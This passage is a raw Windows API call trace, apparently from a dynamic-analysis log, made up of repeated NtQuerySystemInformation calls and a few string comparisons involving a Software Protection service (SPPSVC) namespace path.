(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0272.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.206] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0272.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0272.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0272.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x20, ResultLength=0x0) [0272.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x20, ResultLength=0x0) [0272.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.207] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x50, ResultLength=0x0) [0272.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x50, ResultLength=0x0) [0272.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc70, Length=0x50, ResultLength=0x0) [0272.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0272.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.208] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0272.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0272.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x50, ResultLength=0x0) [0272.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.209] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0272.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x28, ResultLength=0x0) [0272.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.214] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x28, ResultLength=0x0) [0272.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8c0, Length=0x28, ResultLength=0x0) [0272.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc930, Length=0x28, ResultLength=0x0) [0272.215] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0272.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.216] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x28, ResultLength=0x0) [0272.218] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x28, ResultLength=0x0) [0272.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0272.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0272.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0272.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0272.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc890, Length=0x20, ResultLength=0x0) [0272.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x38, ResultLength=0x0) [0272.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0272.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x20, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc8a0, Length=0x20, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.222] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x28, ResultLength=0x0) [0272.223] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0272.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0272.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0272.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0272.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0272.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0272.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaf0, Length=0x28, ResultLength=0x0) [0272.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0272.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x28, ResultLength=0x0) [0272.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.239] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x28, ResultLength=0x0) [0272.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.240] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0272.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x20, ResultLength=0x0) [0272.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0272.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0272.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0272.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.241] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0272.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x20, ResultLength=0x0) [0272.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x20, ResultLength=0x0) [0272.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.242] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x20, ResultLength=0x0) [0272.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0272.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x28, ResultLength=0x0) [0272.243] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0272.243] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0272.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd20, Length=0x50, ResultLength=0x0) [0272.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.244] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0272.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0272.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0272.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca80, Length=0x28, ResultLength=0x0) [0272.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcaf0, Length=0x28, ResultLength=0x0) [0272.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.250] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0272.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x28, ResultLength=0x0) [0272.256] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.257] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x28, ResultLength=0x0) [0272.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0272.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x20, ResultLength=0x0) [0272.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0272.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.258] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0272.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0272.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc50, Length=0x38, ResultLength=0x0) [0272.259] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcad0, Length=0x20, ResultLength=0x0) [0272.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x20, ResultLength=0x0) [0272.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.260] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca60, Length=0x20, ResultLength=0x0) [0272.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.261] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf38, Length=0x50, ResultLength=0x0) [0272.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fceb0, Length=0x28, ResultLength=0x0) [0272.262] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf38, Length=0x50, ResultLength=0x0) [0272.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf38, Length=0x50, ResultLength=0x0) [0272.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x50, ResultLength=0x0) [0272.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcda0, Length=0x28, ResultLength=0x0) [0272.262] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0272.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.262] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x50, ResultLength=0x0) [0272.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x50, ResultLength=0x0) [0272.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x50, ResultLength=0x0) [0272.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.263] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd50, Length=0x38, ResultLength=0x0) [0272.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x28, ResultLength=0x0) [0272.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x28, ResultLength=0x0) [0272.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb80, Length=0x28, ResultLength=0x0) [0272.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0272.267] 